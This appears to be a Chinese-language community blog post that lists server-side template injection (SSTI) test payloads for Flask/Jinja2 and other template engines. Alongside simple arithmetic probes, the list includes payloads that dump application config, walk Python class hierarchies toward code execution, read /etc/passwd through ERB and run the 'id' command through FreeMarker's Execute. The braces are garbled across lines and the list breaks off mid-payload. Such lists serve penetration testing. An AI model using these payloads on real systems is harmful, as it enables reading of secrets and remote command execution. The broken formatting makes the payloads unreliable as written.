SSTI漏洞模板扫描(flask、Werkzeup)
  TEZNKK3IfmPf 2024年03月29日 27 0

SSTI漏洞模板扫描(flask、Werkzeup) 测试过程

{
  
    
      {4*4}}[[5*5]]
{
  
    
      {7*7}}
{
  
    
      {7*'7'}}
<%= 7 * 7 %>
${3*3}
${
  
    
      {7*7}}
@(1+2)
#{3*3}
#{ 7 * 7 }
{
  
    
      {dump(app)}}
{
  
    
      {app.request.server.all|join(',')}}
{
  
    
      {config.items()}}
{
  
    
      { [].class.base.subclasses() }}
{
  
    
      {''.class.mro()[1].subclasses()}}
{
  
    
      { ''.__class__.__mro__[2].__subclasses__() }}
{% for key, value in config.iteritems() %}<dt>{
  
    
      { key|e }}</dt><dd>{
  
    
      { value|e }}</dd>{% endfor %}
{
  
    
      {'a'.toUpperCase()}} 
{
  
    
      { request }}
{
  
    
      {self}}
<%= File.open('/etc/passwd').read %>
<#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}
[#assign ex = &
【版权声明】本文内容来自摩杜云社区用户原创、第三方投稿、转载,内容版权归原作者所有。本网站的目的在于传递更多信息,不拥有版权,亦不承担相应法律责任。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱: cloudbbs@moduyun.com

  1. 分享:
最后一次编辑于 2024年03月29日 0

暂无评论

推荐阅读
TEZNKK3IfmPf